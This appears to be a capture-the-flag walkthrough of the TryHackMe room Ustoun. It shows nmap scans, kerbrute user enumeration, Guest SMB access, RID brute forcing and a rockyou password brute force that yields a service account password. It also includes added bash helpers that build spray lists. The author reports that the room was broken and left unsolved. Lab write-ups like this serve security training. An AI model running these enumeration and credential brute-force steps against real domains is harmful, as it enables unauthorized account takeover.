
Examining and solving Ustoun (from tryhackme.com)
First of all, I noticed this machine was broken while I was trying to solve it, so I wrote to the owner of the room. The owner made the room private after my notification.
Ustoun is a medium-difficulty machine on TryHackMe. Let's check what we've got with Nmap. In my case, Ustoun's IP is 10.10.110.63.
For a detailed nmap cheat sheet, you can use this link.
ports=$(nmap -p- --min-rate=1000 -T4 10.10.110.63 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
This stores the discovered port numbers in $ports (note the quoting around the grep and sed patterns, so the shell does not expand them) for the detailed Nmap scan.
nmap -p$ports -sC -sV -oA ustoun 10.10.110.63
Scanned 10.10.110.63 with version detection and default scripts, saving the output in all formats as ustoun.*.
Results of the scan. We can see the open ports and services.
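The two-step scan above (fast full-port sweep, then a detailed scan of only the ports found) is worth keeping as a reusable function. The following is an added example, not part of the original writeup: it wraps the port-extraction pipeline in a function and feeds it a constructed nmap report so it runs offline. The port numbers and service names in the sample are made up for illustration and are not the real scan results. One deliberate difference from the author's one-liner: the function keeps only lines whose state is "open", so individually listed "filtered" or "closed" ports (which nmap prints when there are few of them) do not end up in the second scan.

```bash
#!/usr/bin/env bash
# Added example: reusable port extraction for a two-step nmap workflow.
# Not from the original writeup; the sample output below is constructed.

# Constructed sample of a `nmap -p- --min-rate=1000 -T4 <target>` report.
# Ports and services are invented for the example (a 'closed' line is
# included on purpose to show that it is dropped).
SAMPLE_NMAP_OUTPUT='Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.10.110.63
Host is up (0.045s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT      STATE  SERVICE
53/tcp    open   domain
88/tcp    open   kerberos-sec
135/tcp   open   msrpc
139/tcp   open   netbios-ssn
389/tcp   open   ldap
445/tcp   open   microsoft-ds
1433/tcp  closed ms-sql-s
5985/tcp  open   wstools
49667/tcp open   unknown

Nmap done: 1 IP address (1 host up) scanned in 42.17 seconds'

# extract_ports: read an nmap report on stdin, print "53,88,..." on stdout.
# Port lines start with a number and a protocol; only "open" ones are kept.
extract_ports() {
    grep -E '^[0-9]+/(tcp|udp) +open ' \
        | cut -d '/' -f 1 \
        | tr '\n' ',' \
        | sed 's/,$//'
}

# scan_cmd: build the follow-up command from a port list and a target.
# It is printed rather than executed so the example stays offline.
scan_cmd() {
    printf 'nmap -p%s -sC -sV -oA ustoun %s\n' "$1" "$2"
}

ports=$(printf '%s\n' "$SAMPLE_NMAP_OUTPUT" | extract_ports)
echo "open ports: $ports"
echo "follow-up:  $(scan_cmd "$ports" 10.10.110.63)"
```

In a live run, replace the sample variable with the real scan (`nmap -p- --min-rate=1000 -T4 10.10.110.63 | extract_ports`) and execute the printed command.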

We see the hostname (ustoun.local) in the results. We should add this hostname to our /etc/hosts file: Kerberos is tied to the domain (realm) name and to host names in service principal names, so the tooling below should resolve ustoun.local rather than work against the bare IP. The post linked below also notes that by blocking direct IP connections you can get rid of most of the shady or even malicious traffic, significantly improving corporate security. You can check the detailed post here.
echo '10.10.110.63 dc.ustoun.local ustoun.local' | sudo tee -a /etc/hosts
As we see from the Nmap results, this is a Windows Domain Controller. I want to try to leverage password spraying attacks, but I need a valid list of usernames to load into my password sprayer. I will use the Kerbrute tool to enumerate valid Active Directory usernames. You can fetch kerbrute from its repository (prebuilt binaries such as kerbrute_linux_386 are on the project's releases page):
git clone https://github.com/ropnop/kerbrute.git
Now we need to prepare a list of users to enumerate. If you have already started to find usernames around the network, you can make your own user list. Otherwise, you can use something from the SecLists usernames collection:

We have a username list now. Let's find valid usernames with kerbrute (the subcommand is userenum; --dc is the KDC to query and -d the domain):
./kerbrute_linux_386 userenum --dc ustoun.local -d ustoun.local /usr/share/SecLists/Usernames/xato-net-10-million-usernames-dup.txt

I found some usernames. I will walk through the guest account. I checked with crackmapexec whether a 'guest' account was available, but it was not, so I changed it to the 'Guest' account and it worked.

crackmapexec smb ustoun.local -u 'Guest' -p ''
To find more valuable users and groups, I brute-forced relative identifiers (RIDs) over the Guest SMB session, which resolves domain SIDs to account and group names:

crackmapexec smb ustoun.local -u 'Guest' -p '' --rid-brute
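The RID brute output is where the spray list comes from, so it helps to triage it mechanically: separate user accounts from groups and machine accounts, and flag the RIDs that Windows fixes to well-known principals (500 Administrator, 501 Guest, 502 krbtgt, 512 Domain Admins, and so on). The following is an added example, not part of the original writeup or of crackmapexec: the sample lines are constructed to mimic crackmapexec's "RID: DOMAIN\name (SidType)" output, using the account names the writeup mentions (Administrator, Guest, krbtgt, SVC-Kerb) plus invented groups and a machine account. The RID numbers assigned to non-well-known accounts are made up.

```bash
#!/usr/bin/env bash
# Added example: triage of crackmapexec --rid-brute output.
# Not from the original writeup; the sample below is constructed.

# Constructed sample resembling `crackmapexec smb <dc> -u Guest -p '' --rid-brute`.
# Account names come from the writeup; 1000 (DC$) and 1103 are invented.
SAMPLE_RID_OUTPUT='SMB  10.10.110.63  445  DC  [+] Brute forcing RIDs
SMB  10.10.110.63  445  DC  498: USTOUN\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  10.10.110.63  445  DC  500: USTOUN\Administrator (SidTypeUser)
SMB  10.10.110.63  445  DC  501: USTOUN\Guest (SidTypeUser)
SMB  10.10.110.63  445  DC  502: USTOUN\krbtgt (SidTypeUser)
SMB  10.10.110.63  445  DC  512: USTOUN\Domain Admins (SidTypeGroup)
SMB  10.10.110.63  445  DC  513: USTOUN\Domain Users (SidTypeGroup)
SMB  10.10.110.63  445  DC  1000: USTOUN\DC$ (SidTypeUser)
SMB  10.10.110.63  445  DC  1103: USTOUN\SVC-Kerb (SidTypeUser)'

# parse_rids: stdin = crackmapexec output, stdout = "RID|name|SidType" lines.
# Names may contain spaces (e.g. "Domain Admins"), so the domain prefix is
# stripped with a regex instead of splitting on whitespace.
parse_rids() {
    sed -nE 's/^.* ([0-9]+): [^\\]+\\(.+) \((SidType[A-Za-z]+)\)[[:space:]]*$/\1|\2|\3/p'
}

# spray_users: user accounts only; machine accounts (names ending in $) are
# dropped because their passwords are random and not worth spraying.
spray_users() {
    parse_rids | awk -F'|' '$3 == "SidTypeUser" && $2 !~ /\$$/ { print $2 }'
}

# flag_wellknown: annotate RIDs that Windows reserves for fixed principals,
# so the high-value targets stand out regardless of how they were renamed.
flag_wellknown() {
    parse_rids | awk -F'|' '
        BEGIN {
            w[498] = "Enterprise Read-only Domain Controllers"
            w[500] = "built-in Administrator"
            w[501] = "built-in Guest"
            w[502] = "krbtgt (KDC service account)"
            w[512] = "Domain Admins"
            w[513] = "Domain Users"
            w[514] = "Domain Guests"
            w[515] = "Domain Computers"
            w[516] = "Domain Controllers"
            w[518] = "Schema Admins"
            w[519] = "Enterprise Admins"
            w[520] = "Group Policy Creator Owners"
            w[521] = "Read-only Domain Controllers"
        }
        ($1 in w) { print $1 "|" $2 "|" w[$1] }'
}

echo "== candidate users for spraying =="
printf '%s\n' "$SAMPLE_RID_OUTPUT" | spray_users
echo "== well-known RIDs present =="
printf '%s\n' "$SAMPLE_RID_OUTPUT" | flag_wellknown
```

Against a live target, pipe the real crackmapexec output into `spray_users > users.txt` and feed that file to the sprayer; the well-known RID list is also the quickest way to spot a renamed built-in Administrator, since RID 500 never changes.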
I tried to brute-force the krbtgt, Guest, Administrator, and SVC-Kerb users, and SVC-Kerb worked for me. Keep in mind that brute-forcing a domain account against the DC can hit the account lockout threshold; it is worth checking the password policy first (crackmapexec's --pass-pol option) before running a full wordlist.
crackmapexec smb ustoun.local -u 'SVC-Kerb' -p /usr/share/wordlists/rockyou.txt

I brute-forced the password over SMB. If the WinRM port is open, we can log in with this password, which makes further penetration much easier. WinRM's default port is 5985 (5986 for HTTPS). Let's check it.

nmap -sV -p 5985 ustoun.local
The host is up, so I tried evil-winrm.
To install evil-winrm:
gem install evil-winrm
Then:
evil-winrm -i ustoun.local -u SVC-Kerb -p superman

But it didn't work.
After that step, I did some research about the room and realized this room is broken!
So I did not solve it.
From that research, the MSSQL port should be open for this room, but it is closed now. I wrote to the creator of the room. I will solve it after the fix.